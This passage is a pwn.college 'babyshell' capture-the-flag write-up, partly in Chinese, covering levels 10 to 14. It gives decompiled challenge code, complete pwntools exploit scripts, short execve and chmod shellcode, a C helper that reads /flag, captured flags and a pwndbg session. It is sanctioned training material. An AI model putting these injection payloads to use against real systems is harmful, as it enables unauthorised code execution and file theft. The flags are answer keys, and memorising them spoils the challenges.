    __assert_fail("shellcode == (void *)0x24aa2000", "/challenge/babyshell-level-10.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x24AA2000);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-10.c", 0x67u, "main");
  puts("Executing filter...\n");
  v13 = shellcode;
  v10 = ((unsigned __int64)shellcode_size >> 3) - 1;
  for ( k = 0; k < v10; ++k )
  {
    for ( m = 0; m < v10 - k - 1; ++m )
    {
      if ( v13[m] > v13[m + 1] )
      {
        v14 = v13[m];
        v13[m] = v13[m + 1];
        v13[m + 1] = v14;
      }
    }
  }
  puts(
    "This challenge just sorted your shellcode using bubblesort. Keep in mind the impact of memory endianness on this sort");
  puts("(e.g., the LSB being the right-most byte).\n");
  printf("This sort processed your shellcode %d bytes at a time.\n", 8);
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_259D);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

如果你的 shellcode 足够长的话会对部分指令进行冒泡排序，但是如果比较短的话这个限制就形同虚设了。这里我直接用之前的 exp 了。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, os, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-10"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
        target.recvall(timeout=5)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = shellcraft.chmod("f", 0o4)

    return asm(shellcode)


def attack(target, payload):
    os.system("ln -s /flag f")
    send_payload(target, payload)

    try:
        with open("./f", "r") as file:
            content = file.read()

            log.success(content)
    except FileNotFoundError:
        log.error("The file './f' does not exist.")
    except PermissionError:
        log.error("Permission denied to read './f'.")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{g5e9JB4cUp4THYN75FdmwWgVFA3.0lNyIDL5cTNxgzW}

Level 11

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but your input is sorted before being executed and stdin is closed.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+28h] [rbp-38h]
  int k; // [rsp+2Ch] [rbp-34h]
  int m; // [rsp+30h] [rbp-30h]
  int v10; // [rsp+34h] [rbp-2Ch]
  const char **i; // [rsp+38h] [rbp-28h]
  const char **j; // [rsp+40h] [rbp-20h]
  _QWORD *v13; // [rsp+48h] [rbp-18h]
  __int64 v14; // [rsp+50h] [rbp-10h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x21A35000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)564350976 )
    __assert_fail("shellcode == (void *)0x21a35000", "/challenge/babyshell-level-11.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x21A35000);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-11.c", 0x67u, "main");
  puts("Executing filter...\n");
  v13 = shellcode;
  v10 = ((unsigned __int64)shellcode_size >> 3) - 1;
  for ( k = 0; k < v10; ++k )
  {
    for ( m = 0; m < v10 - k - 1; ++m )
    {
      if ( v13[m] > v13[m + 1] )
      {
        v14 = v13[m];
        v13[m] = v13[m + 1];
        v13[m + 1] = v14;
      }
    }
  }
  puts(
    "This challenge just sorted your shellcode using bubblesort. Keep in mind the impact of memory endianness on this sort");
  puts("(e.g., the LSB being the right-most byte).\n");
  printf("This sort processed your shellcode %d bytes at a time.\n", 8);
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(byte_259D);
  puts(
    "This challenge is about to close stdin, which means that it will be harder to pass in a stage-2 shellcode. You will need");
  puts("to figure an alternate solution (such as unpacking shellcode in memory) to get past complex filters.\n");
  if ( fclose(stdin) )
    __assert_fail("fclose(stdin) == 0", "/challenge/babyshell-level-11.c", 0x7Fu, "main");
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

就算你把 stdin 也关了又如何，不还是无法阻止我使用之前的 exp 哈哈哈哈哈哈哈。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, os, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-11"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
        target.recvall(timeout=5)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = shellcraft.chmod("f", 0o4)

    return asm(shellcode)


def attack(target, payload):
    os.system("ln -s /flag f")
    send_payload(target, payload)

    try:
        with open("./f", "r") as file:
            content = file.read()

            log.success(content)
    except FileNotFoundError:
        log.error("The file './f' does not exist.")
    except PermissionError:
        log.error("Permission denied to read './f'.")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Ed61x95iAxED3sEmx4x19WauOCW.01NyIDL5cTNxgzW}

Level 12

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but every byte in your input must be unique.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+28h] [rbp-128h]
  int k; // [rsp+2Ch] [rbp-124h]
  const char **i; // [rsp+30h] [rbp-120h]
  const char **j; // [rsp+38h] [rbp-118h]
  _QWORD v11[34]; // [rsp+40h] [rbp-110h] BYREF

  v11[33] = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x1C246000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)472145920 )
    __assert_fail("shellcode == (void *)0x1c246000", "/challenge/babyshell-level-12.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x1C246000);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-12.c", 0x67u, "main");
  puts("Executing filter...\n");
  puts("This challenge requires that every byte in your shellcode is unique!\n");
  memset(v11, 0, 256);
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
  {
    if ( *((_BYTE *)v11 + *((unsigned __int8 *)shellcode + k)) )
    {
      printf("Failed filter at byte %d!\n", k);
      exit(1);
    }
    *((_BYTE *)v11 + *((unsigned __int8 *)shellcode + k)) = 1;
  }
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_2525);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

就你要每一个字节都得唯一是吧，execve 调用外部 shellcode 秒了！

cdq 是一字节指令，有时候用来取代 xor edx, edx 很不错。它的作用请参考 CWD/CDQ/CQO — Convert Word to Doubleword/Convert Doubleword to Quadword.

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-12"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = """
    /* execve(path='a', argv=0, envp=0) */
    /* push b'a\x00' */
    push 0x61
    mov rdi, rsp
    xor esi, esi
    cdq
    /* call execve() */
    mov al, 59 /* 0x3b */
    syscall
    """

    return asm(shellcode)


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

我们的 shellcode 的目的就是加载外部脚本完成剩余攻击步骤。注意把下面脚本编译为 a（文件名）。

#include <fcntl.h>
#include <sys/sendfile.h>

int main() {
  sendfile(1, open("/flag", O_RDONLY), 0, 0x1000);

  return 0;
}

Flag

Flag: pwn.college{g4UdtC88x4ayx2CjkFQNdxcSBsC.0FOyIDL5cTNxgzW}

Level 13

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but this time you only get 12 bytes!

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+2Ch] [rbp-14h]
  const char **i; // [rsp+30h] [rbp-10h]
  const char **j; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x2A318000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)707887104 )
    __assert_fail("shellcode == (void *)0x2a318000", "/challenge/babyshell-level-13.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2A318000);
  puts("Reading 0xc bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0xCuLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-13.c", 0x67u, "main");
  puts("Removing write permissions from first 4096 bytes of shellcode.\n");
  if ( mprotect(shellcode, 0x1000uLL, 5) )
    __assert_fail(
      "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0",
      "/challenge/babyshell-level-13.c",
      0x6Au,
      "main");
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_251D);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

12 bytes 是吧，巧了，哥们上一个 exp 就压在 12 bytes 上了。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-13"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = """
    /* execve(path='a', argv=0, envp=0) */
    /* push b'a\x00' */
    push 0x61
    mov rdi, rsp
    xor esi, esi
    cdq
    /* call execve() */
    mov al, 59 /* 0x3b */
    syscall
    """

    return asm(shellcode)


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{s_8hupYRZPagLrq6OX3Dd--4PYY.0VOyIDL5cTNxgzW}

Level 14

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but this time you only get 6 bytes :)

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+2Ch] [rbp-14h]
  const char **i; // [rsp+30h] [rbp-10h]
  const char **j; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x2C0A3000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)738865152 )
    __assert_fail("shellcode == (void *)0x2c0a3000", "/challenge/babyshell-level-14.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2C0A3000);
  puts("Reading 0x6 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 6uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-14.c", 0x67u, "main");
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_24A5);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

6 bytes，看似好像是一件不可能完成的任务，butttt，如果你尝试动态调试会就会发现，rax 的值正好可以用于 syscall 来调用 read；rdx 的值正好可以用做 read 的第二个参数，指定 buf 地址；rsi 的值足够大，正好用作 read 的第三个参数，指定输入大小。

pwndbg> disass main
Dump of assembler code for function main:
   0x0000000000001547 <+0>: endbr64
   0x000000000000154b <+4>: push   rbp
   0x000000000000154c <+5>: mov    rbp,rsp
   0x000000000000154f <+8>: sub    rsp,0x40
   0x0000000000001553 <+12>: mov    DWORD PTR [rbp-0x24],edi
   0x0000000000001556 <+15>: mov    QWORD PTR [rbp-0x30],rsi
   0x000000000000155a <+19>: mov    QWORD PTR [rbp-0x38],rdx
   0x000000000000155e <+23>: mov    rax,QWORD PTR [rip+0x2abb]        # 0x4020 <stdin@@GLIBC_2.2.5>
   0x0000000000001565 <+30>: mov    ecx,0x0
   0x000000000000156a <+35>: mov    edx,0x2
   0x000000000000156f <+40>: mov    esi,0x0
   0x0000000000001574 <+45>: mov    rdi,rax
   0x0000000000001577 <+48>: call   0x11d0 <setvbuf@plt>
   0x000000000000157c <+53>: mov    rax,QWORD PTR [rip+0x2a8d]        # 0x4010 <stdout@@GLIBC_2.2.5>
   0x0000000000001583 <+60>: mov    ecx,0x0
   0x0000000000001588 <+65>: mov    edx,0x2
   0x000000000000158d <+70>: mov    esi,0x0
   0x0000000000001592 <+75>: mov    rdi,rax
   0x0000000000001595 <+78>: call   0x11d0 <setvbuf@plt>
   0x000000000000159a <+83>: lea    rdi,[rip+0xc24]        # 0x21c5
   0x00000000000015a1 <+90>: call   0x1130 <puts@plt>
   0x00000000000015a6 <+95>: mov    rax,QWORD PTR [rbp-0x30]
   0x00000000000015aa <+99>: mov    rax,QWORD PTR [rax]
   0x00000000000015ad <+102>: mov    rsi,rax
   0x00000000000015b0 <+105>: lea    rdi,[rip+0xc12]        # 0x21c9
   0x00000000000015b7 <+112>: mov    eax,0x0
   0x00000000000015bc <+117>: call   0x1170 <printf@plt>
   0x00000000000015c1 <+122>: lea    rdi,[rip+0xbfd]        # 0x21c5
   0x00000000000015c8 <+129>: call   0x1130 <puts@plt>
   0x00000000000015cd <+134>: mov    edi,0xa
   0x00000000000015d2 <+139>: call   0x1120 <putchar@plt>
   0x00000000000015d7 <+144>: lea    rdi,[rip+0xc02]        # 0x21e0
   0x00000000000015de <+151>: call   0x1130 <puts@plt>
   0x00000000000015e3 <+156>: lea    rdi,[rip+0xc76]        # 0x2260
   0x00000000000015ea <+163>: call   0x1130 <puts@plt>
   0x00000000000015ef <+168>: lea    rdi,[rip+0xce2]        # 0x22d8
   0x00000000000015f6 <+175>: call   0x1130 <puts@plt>
   0x00000000000015fb <+180>: lea    rdi,[rip+0xd4e]        # 0x2350
   0x0000000000001602 <+187>: call   0x1130 <puts@plt>
   0x0000000000001607 <+192>: mov    DWORD PTR [rbp-0x14],0x3
   0x000000000000160e <+199>: jmp    0x161e <main+215>
   0x0000000000001610 <+201>: mov    eax,DWORD PTR [rbp-0x14]
   0x0000000000001613 <+204>: mov    edi,eax
   0x0000000000001615 <+206>: call   0x11a0 <close@plt>
   0x000000000000161a <+211>: add    DWORD PTR [rbp-0x14],0x1
   0x000000000000161e <+215>: cmp    DWORD PTR [rbp-0x14],0x270f
   0x0000000000001625 <+222>: jle    0x1610 <main+201>
   0x0000000000001627 <+224>: mov    rax,QWORD PTR [rbp-0x30]
   0x000000000000162b <+228>: mov    QWORD PTR [rbp-0x10],rax
   0x000000000000162f <+232>: jmp    0x165c <main+277>
   0x0000000000001631 <+234>: mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000001635 <+238>: mov    rax,QWORD PTR [rax]
   0x0000000000001638 <+241>: mov    rdi,rax
   0x000000000000163b <+244>: call   0x1150 <strlen@plt>
   0x0000000000001640 <+249>: mov    rdx,rax
   0x0000000000001643 <+252>: mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000001647 <+256>: mov    rax,QWORD PTR [rax]
   0x000000000000164a <+259>: mov    esi,0x0
   0x000000000000164f <+264>: mov    rdi,rax
   0x0000000000001652 <+267>: call   0x1190 <memset@plt>
   0x0000000000001657 <+272>: add    QWORD PTR [rbp-0x10],0x8
   0x000000000000165c <+277>: mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000001660 <+281>: mov    rax,QWORD PTR [rax]
   0x0000000000001663 <+284>: test   rax,rax
   0x0000000000001666 <+287>: jne    0x1631 <main+234>
   0x0000000000001668 <+289>: mov    rax,QWORD PTR [rbp-0x38]
   0x000000000000166c <+293>: mov    QWORD PTR [rbp-0x8],rax
   0x0000000000001670 <+297>: jmp    0x169d <main+342>
   0x0000000000001672 <+299>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000001676 <+303>: mov    rax,QWORD PTR [rax]
   0x0000000000001679 <+306>: mov    rdi,rax
   0x000000000000167c <+309>: call   0x1150 <strlen@plt>
   0x0000000000001681 <+314>: mov    rdx,rax
   0x0000000000001684 <+317>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000001688 <+321>: mov    rax,QWORD PTR [rax]
   0x000000000000168b <+324>: mov    esi,0x0
   0x0000000000001690 <+329>: mov    rdi,rax
   0x0000000000001693 <+332>: call   0x1190 <memset@plt>
   0x0000000000001698 <+337>: add    QWORD PTR [rbp-0x8],0x8
   0x000000000000169d <+342>: mov    rax,QWORD PTR [rbp-0x8]
   0x00000000000016a1 <+346>: mov    rax,QWORD PTR [rax]
   0x00000000000016a4 <+349>: test   rax,rax
   0x00000000000016a7 <+352>: jne    0x1672 <main+299>
   0x00000000000016a9 <+354>: mov    r9d,0x0
   0x00000000000016af <+360>: mov    r8d,0x0
   0x00000000000016b5 <+366>: mov    ecx,0x22
   0x00000000000016ba <+371>: mov    edx,0x7
   0x00000000000016bf <+376>: mov    esi,0x1000
   0x00000000000016c4 <+381>: mov    edi,0x2c0a3000
   0x00000000000016c9 <+386>: call   0x1160 <mmap@plt>
   0x00000000000016ce <+391>: mov    QWORD PTR [rip+0x2963],rax        # 0x4038 <shellcode>
   0x00000000000016d5 <+398>: mov    rax,QWORD PTR [rip+0x295c]        # 0x4038 <shellcode>
   0x00000000000016dc <+405>: cmp    rax,0x2c0a3000
   0x00000000000016e2 <+411>: je     0x1703 <main+444>
   0x00000000000016e4 <+413>: lea    rcx,[rip+0xdde]        # 0x24c9 <__PRETTY_FUNCTION__.25265>
   0x00000000000016eb <+420>: mov    edx,0x62
   0x00000000000016f0 <+425>: lea    rsi,[rip+0xcc9]        # 0x23c0
   0x00000000000016f7 <+432>: lea    rdi,[rip+0xce2]        # 0x23e0
   0x00000000000016fe <+439>: call   0x1180 <__assert_fail@plt>
   0x0000000000001703 <+444>: mov    rax,QWORD PTR [rip+0x292e]        # 0x4038 <shellcode>
   0x000000000000170a <+451>: mov    rsi,rax
   0x000000000000170d <+454>: lea    rdi,[rip+0xcec]        # 0x2400
   0x0000000000001714 <+461>: mov    eax,0x0
   0x0000000000001719 <+466>: call   0x1170 <printf@plt>
   0x000000000000171e <+471>: lea    rdi,[rip+0xd0b]        # 0x2430
   0x0000000000001725 <+478>: call   0x1130 <puts@plt>
   0x000000000000172a <+483>: mov    rax,QWORD PTR [rip+0x2907]        # 0x4038 <shellcode>
   0x0000000000001731 <+490>: mov    edx,0x6
   0x0000000000001736 <+495>: mov    rsi,rax
   0x0000000000001739 <+498>: mov    edi,0x0
   0x000000000000173e <+503>: call   0x11b0 <read@plt>
   0x0000000000001743 <+508>: mov    QWORD PTR [rip+0x28e6],rax        # 0x4030 <shellcode_size>
   0x000000000000174a <+515>: mov    rax,QWORD PTR [rip+0x28df]        # 0x4030 <shellcode_size>
   0x0000000000001751 <+522>: test   rax,rax
   0x0000000000001754 <+525>: jne    0x1775 <main+558>
   0x0000000000001756 <+527>: lea    rcx,[rip+0xd6c]        # 0x24c9 <__PRETTY_FUNCTION__.25265>
   0x000000000000175d <+534>: mov    edx,0x67
   0x0000000000001762 <+539>: lea    rsi,[rip+0xc57]        # 0x23c0
   0x0000000000001769 <+546>: lea    rdi,[rip+0xcdf]        # 0x244f
   0x0000000000001770 <+553>: call   0x1180 <__assert_fail@plt>
   0x0000000000001775 <+558>: lea    rdi,[rip+0xcec]        # 0x2468
   0x000000000000177c <+565>: call   0x1130 <puts@plt>
   0x0000000000001781 <+570>: mov    rdx,QWORD PTR [rip+0x28a8]        # 0x4030 <shellcode_size>
   0x0000000000001788 <+577>: mov    rax,QWORD PTR [rip+0x28a9]        # 0x4038 <shellcode>
   0x000000000000178f <+584>: mov    rsi,rdx
   0x0000000000001792 <+587>: mov    rdi,rax
   0x0000000000001795 <+590>: call   0x12e9 <print_disassembly>
   0x000000000000179a <+595>: lea    rdi,[rip+0xd04]        # 0x24a5
   0x00000000000017a1 <+602>: call   0x1130 <puts@plt>
   0x00000000000017a6 <+607>: lea    rdi,[rip+0xcf9]        # 0x24a6
   0x00000000000017ad <+614>: call   0x1130 <puts@plt>
   0x00000000000017b2 <+619>: mov    rax,QWORD PTR [rip+0x287f]        # 0x4038 <shellcode>
   0x00000000000017b9 <+626>: mov    rdx,rax
   0x00000000000017bc <+629>: mov    eax,0x0
   0x00000000000017c1 <+634>: call   rdx
   0x00000000000017c3 <+636>: lea    rdi,[rip+0xcf2]        # 0x24bc
   0x00000000000017ca <+643>: call   0x1130 <puts@plt>
   0x00000000000017cf <+648>: mov    eax,0x0
   0x00000000000017d4 <+653>: leave
   0x00000000000017d5 <+654>: ret
End of assembler dump.
pwndbg> b *main+634
Breakpoint 1 at 0x17c1
pwndbg> r
Starting program: /home/cub3y0nd/Projects/pwn.college/babyshell-level-14
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
###
### Welcome to /home/cub3y0nd/Projects/pwn.college/babyshell-level-14!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x2c0a3000!
Reading 0x6 bytes from stdin.


This challenge is about to execute the following shellcode:

ERROR: Failed to disassemble shellcode! Bytes are:

      Address      |                      Bytes
--------------------------------------------------------------------
0x000000002c0a3000 | 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Executing shellcode!


Breakpoint 1, 0x0000614116b287c1 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
─────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
 RAX  0
 RBX  0x7ffd5ec85d08 —▸ 0x7ffd5ec86c08 ◂— 0
 RCX  0x71ac56b1b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x2c0a3000 ◂— 0xa /* '\n' */
 RDI  0x71ac56bf8710 ◂— 0
 RSI  0x71ac56bf7643 (_IO_2_1_stdout_+131) ◂— 0xbf8710000000000a /* '\n' */
 R8   0x614119b31010 ◂— 0
 R9   7
 R10  0x614119b312a0 ◂— 0x614119b31
 R11  0x202
 R12  1
 R13  0
 R14  0x71ac573d0000 (_rtld_global) —▸ 0x71ac573d12e0 —▸ 0x614116b27000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffd5ec85be0 —▸ 0x7ffd5ec85c80 —▸ 0x7ffd5ec85ce0 ◂— 0
 RSP  0x7ffd5ec85ba0 ◂— 0
 RIP  0x614116b287c1 (main+634) ◂— call rdx
──────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────
 ► 0x614116b287c1 <main+634>              call   rdx                         <0x2c0a3000>

   0x614116b287c3 <main+636>              lea    rdi, [rip + 0xcf2]     RDI => 0x614116b294bc ◂— '### Goodbye!'
   0x614116b287ca <main+643>              call   puts@plt                    <puts@plt>

   0x614116b287cf <main+648>              mov    eax, 0                      EAX => 0
   0x614116b287d4 <main+653>              leave
   0x614116b287d5 <main+654>              ret

   0x614116b287d6                         nop    word ptr cs:[rax + rax]
   0x614116b287e0 <__libc_csu_init>       endbr64
   0x614116b287e4 <__libc_csu_init+4>     push   r15
   0x614116b287e6 <__libc_csu_init+6>     lea    r15, [rip + 0x2553]         R15 => 0x614
116b2ad40 (__init_array_start) —▸ 0x614116b282e0 (frame_dummy) ◂— endbr64
   0x614116b287ed <__libc_csu_init+13>    push   r14
────────────────────────────────────────[ STACK ]────────────────────────────────────────
00:0000│ rsp 0x7ffd5ec85ba0 ◂— 0
01:0008│-038 0x7ffd5ec85ba8 —▸ 0x7ffd5ec85d18 —▸ 0x7ffd5ec86c3f ◂— 0
